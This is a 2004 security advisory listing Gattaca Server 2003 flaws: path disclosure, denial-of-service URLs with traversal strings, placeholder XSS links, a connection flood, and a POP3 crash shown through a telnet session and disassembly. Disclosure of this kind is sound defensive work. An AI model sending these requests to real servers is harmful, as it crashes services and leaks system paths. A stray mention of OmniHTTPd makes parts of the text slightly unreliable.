Gattaca Server 2003 version 1.1.10.0 is susceptible to full path disclosure, cross site scripting, and multiple denial of service attacks.
a2081aacff40e09987d1fdd220f9e159cd210b6b03a5656b73841afd03dd340d
www.r34ct.tk
Security Advisory
Advisory Name: Gattaca Server 2003 (1.1.10.0)
Release Date: 07/15/2004
Application: Gattaca Server 2003 (1.1.10.0)
Platform: Windows XP/NT
Severity: Medium
Author: dr_insane (dr_insane@pathfinder.gr)
Description:
A high performance Windows NT based Mail and Web Server software for building own intranet. You may
register unlimited users, use unlimited domains. Supporting POP3, SMTP, and HTTP protocols. Integrated
with TMPL library, allow you write own CGI scripts.
Multiple vulnerabilities have been identified in Gattaca server 2003 that may allow a remote attacker
to compromise a remote system.
Details:
Issue #1: Installation path exposure
A malicious user can gain knowledge of the installation path by sending a null byte to the server.
example: http://[host]/%00
Output:
--------------------------------------------------------------------------------
(X)TMPL error
File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid
Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\
--------------------------------------------------------------------------------
Issue #2: WWW-root path exposure
There is a second vulnerability that can be used to reveal the WWw root directory.Input passed to the "Language"
parameter in certain scripts isn't properly sanitised before being returned to the user.
example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]
Output:
(X)TMPL error
File /whatever/_head.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/web.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_foot.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
Issue #3: Denial of Service attack
The third issue is a denial of service attack that can be used to to slow a remote system. The CPU usage
will hit 100% and the server will become unavailable.
Examples:
http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en
issue #4: Cross site scripting injection
Another vulnerability has been found in Gattaca server , which can be exploited by malicous people to conduct XSS attacks.
This can be exploited by creating a malicious link including script code, which will be executed in a user's browser when
the link is clicked or a malicious web site is visited. Successful exploitation may result in disclosure of various
information (eg. cookie-based authentication information) associated with the site running OmniHTTPd or inclusion of
malicious content, which the user thinks is part of the real website.
examples:
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en
issue #5: Denial of service attack [2]
Gattacca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By establishing about 600
connections on port 25 or port 110 the server will crash.
issue #6: Denial of service attack [3] - message handling
By connecting and authenticating on POP3 service a remote user can crash Gattaca service. There are multiple problems
in the way the servers handles the commands list, retr and uidl.
example:
C:\>telnet r34ct-krew 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis>
user test
+OK User name accepted, password please :-|
pass w
+OK GeeOS mail box open ;-)
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405
The commands above will crash the server. An error message will be generate:
"Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation.
-------------snip---------------
0037A382 or eax,eax
0037A384 je 0037A4C5
0037A38A mov edi,eax
0037A38C shl edi,4
0037A38F cmp dword ptr [ebp+edi-7624h],0FFh
0037A397 je 0037A46F
0037A39D mov edi,eax
0037A39F shl edi,4
0037A3A2 cmp byte ptr [ebp+edi-762Ch],0
0037A3AA je 0037A416
0037A3AC mov edi,eax
0037A3AE mov esi,edi
0037A3B0 shl esi,4
------------snip----------------
Workaround:
Use another product
Credit:
Dr_insane
Http://members.lycos.co.uk/r34ct/
Feedback
Please send your comments to: dr_insane@pathfinder.gr